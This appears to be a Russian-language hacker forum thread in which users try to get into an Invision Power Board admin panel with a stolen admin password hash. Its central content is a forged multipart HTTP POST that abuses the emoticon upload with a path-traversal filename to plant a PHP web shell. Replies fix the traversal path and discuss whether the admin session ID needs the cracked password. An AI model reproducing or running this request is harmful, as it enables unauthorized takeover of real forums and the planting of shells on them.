Да стати когда ставиш относительный путь типа "../../my.php" то он файл не создает, хотя директория доступна на запись, сам выставлял права, т.е. естил на своем форуме.

Свободно...

народ получил хэш захожу под админом все ок, а в admin.php нужен пароль, перебрал кучу словарей кароче кирдык, как можно в админку залесть зная хэш админa?

с этим скриптом выдает ошибку

id='description'>You must have administrative access to successfully log into the Invision Board Admin CP.<br>Please enter your forums username and password below<br><br><span style='color:red;font-weight:bold'>Could not retrieve session record</span></div> <!--IPB.ERROR--> <!--IPB.MESSAGE-->

прально ли я понял?

POST http*://site.com/forum/admin.php?adsess=ид сесия? HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http*://site.com/forum/admin.php?ид сесия?&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=ид админа;
pass_hash=тут понято;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

ид сесия?
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../forum/uploads/lol.php"
Content-Type: application/octet-stream

нада еще что то менять? и дальше где исходник шела нада с ковычками? или просто (исходинк)?

мдя =)
Этот путь указан неверно.
../../forum/uploads/lol.php

../../ <-это означает что файл заливается на 2 дириктории вниз (блеже к корневой)
допустим www.lol.ru/dir1/dir2/dir3/admin.php
находясь в админпхп чтобы залить файл в dir2 надо указать путь ../../upload_file
чтобы в dir1 то ../../../upload_file
Вот так если я нечего непутаю.

Второе у тебя нехватает самого аплоада

<% echo("php script") %>
-----------------------------7d43942c405bc--

без расшифровки пароля залить шелл не получится. Ты админский пароль расшифровал?

для этого он и подделывает запрос. чтобы хэш нерасшифровывать. тут может помешать только чмод.

Нет, расшифрованный админский пароль все равно нужен. Иначе ты adsess не узнаешь

ну ептель тогда нет смысла париться с этими паками :\